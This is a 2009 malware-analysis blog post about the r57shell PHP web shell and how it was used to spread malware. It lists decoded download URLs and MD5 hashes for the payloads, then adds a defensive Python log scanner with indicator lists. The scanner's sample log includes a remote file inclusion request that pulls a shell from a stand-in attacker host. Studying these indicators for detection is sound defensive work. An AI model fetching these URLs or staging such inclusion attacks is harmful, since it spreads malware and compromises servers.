Thursday, April 16, 2009

Scripting attack. Exploitation of multiple vulnerabilities

The execution of malicious code via scripting attacks is part of the folklore of current malware. However, behind this whole battery of infection methods are applications designed specifically to carry out such malicious acts.

Usually these are crimeware applications such as ZeuS, Barracuda, Chamaleon, YES, etc., or remote shells written in PHP, as in this case: the well-known r57shell.

There are many applications of this kind (c99shell, c100shell, Locus NetShell, etc.) that are usually implanted on a vulnerable server via RFI (Remote File Inclusion) and used for mass defacement of web pages.

However, while that is their customary purpose, they are also fully employed for attacks via the web using malicious code, such as DDoS, SQL injection and the recruitment of zombie computers, among others.

As we can see in this second capture, r57shell offers many features, and they don't answer to a casual or trivial intention: the aim is to fully control the server where it is implanted. In other words, it is a backdoor from which an attacker can take complete control of the server, and of every site on the same hosting.

In this case, the PHP shell was being used to spread malware by exploiting the following vulnerabilities:
All the exploits for these vulnerabilities are contained in a single script that looks similar to the following (the capture has, by the way, been cropped).

Decoding the script yields the following URLs:
  • http://vsedlysna.ru/img/site/2/load.php?id=83 --> Downloads the file load.exe (MD5: 22027b5c4394c7095c4310e2ec605808), packed with ASPack v2.12.
  • http://vsedlysna.ru/img/site/2/pdf.php?id=83 --> Downloads the file 9040.pdf (MD5: 3b9e76642e96f3626cf25b7f3f9d6c3a), where the filename is a random value that changes on each download, adopting names like 8795.pdf, 7436.pdf, 6100.pdf, etc.
  • http://vsedlysna.ru/img/site/2/pdf.php?id=83&vis=1 --> Downloads a PDF file whose name varies on each access, following the same methodology as the previous case. In this case, the file is called 4099.pdf (MD5: 5caf548ff3e6ae0c9101ae647757a099).
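As an added illustration for defenders (this is not code from the original post, nor from r57shell), the following Python script shows how the two points above can be turned into detection logic: spotting RFI attempts in a web server's access log (a query parameter whose value is itself an absolute URL, the way a remote shell is typically pulled in), and matching requests and downloaded files against the indicators listed in this post. The download URLs and MD5 hashes come from the post; the log lines are constructed for the example and mix an inbound web-server line with outbound proxy lines in the same Apache "combined" format. Nothing is fetched from the network; the domain is only compared as a string.

```python
"""Scan access-log lines for (1) remote file inclusion attempts and
(2) hits on the download URLs / payload hashes listed in the post.
The log lines below are constructed for this example."""
import hashlib
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators taken from the post: host + path of each download URL,
# and the MD5 of each payload with the file name the post gives it.
IOC_URLS = {
    "vsedlysna.ru/img/site/2/load.php",
    "vsedlysna.ru/img/site/2/pdf.php",
}
IOC_MD5 = {
    "22027b5c4394c7095c4310e2ec605808": "load.exe",
    "3b9e76642e96f3626cf25b7f3f9d6c3a": "9040.pdf",
    "5caf548ff3e6ae0c9101ae647757a099": "4099.pdf",
}

# Minimal parse of the Apache "combined" format: client IP, request line, referer.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# A parameter value that is an absolute URL is the classic RFI signature.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (not from the post). Line 2 is an inbound RFI
# attempt; lines 3 and 4 are outbound requests seen through a proxy.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Apr/2009:10:01:02 +0200] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Apr/2009:10:01:07 +0200] "GET /index.php?page=http://evil.example/r57.txt? HTTP/1.1" 200 8192 "-" "libwww-perl/5.805"
10.0.0.9 - - [16/Apr/2009:10:02:11 +0200] "GET http://vsedlysna.ru/img/site/2/load.php?id=83 HTTP/1.1" 200 65536 "-" "Mozilla/4.0"
10.0.0.12 - - [16/Apr/2009:10:03:40 +0200] "GET /img/site/2/pdf.php?id=83&vis=1 HTTP/1.1" 200 12000 "http://vsedlysna.ru/img/site/2/pdf.php?id=83&vis=1" "Mozilla/4.0"
"""


def rfi_params(uri):
    """Names of query parameters whose value is an absolute URL (RFI attempt)."""
    query = urlsplit(uri).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME.match(v)]


def ioc_url_hit(url):
    """True if url (absolute) points at one of the download URLs from the post."""
    parts = urlsplit(url)
    if not parts.netloc:
        return False  # relative URI: host unknown, cannot match an IoC host
    return f"{parts.netloc.lower()}{parts.path}" in IOC_URLS


def classify_md5(data):
    """Payload name from the post if data's MD5 is a listed IoC, else None."""
    return IOC_MD5.get(hashlib.md5(data).hexdigest())


def scan_log(text):
    """Return (client_ip, finding) tuples for every suspicious log line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; real tooling should count these
        ip, uri, referer = m["ip"], m["uri"], m["referer"]
        for name in rfi_params(uri):
            findings.append((ip, f"RFI attempt via parameter '{name}': {uri}"))
        for candidate in (uri, referer):  # request URI (proxy) or referer
            if ioc_url_hit(candidate):
                findings.append((ip, f"known malware download URL: {candidate}"))
    return findings


if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{finding}")
    print("sample bytes:", classify_md5(b"constructed, not a real payload"))
```

Run against the constructed lines it reports the RFI attempt from 10.0.0.9, the load.php download from the same host, and the pdf.php download seen via the referer of 10.0.0.12. For the hash check, feed `classify_md5` the bytes of a quarantined file; the randomised `NNNN.pdf` names described above are exactly why matching on content hash, not file name, is the useful check.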

# Jorge Mieres
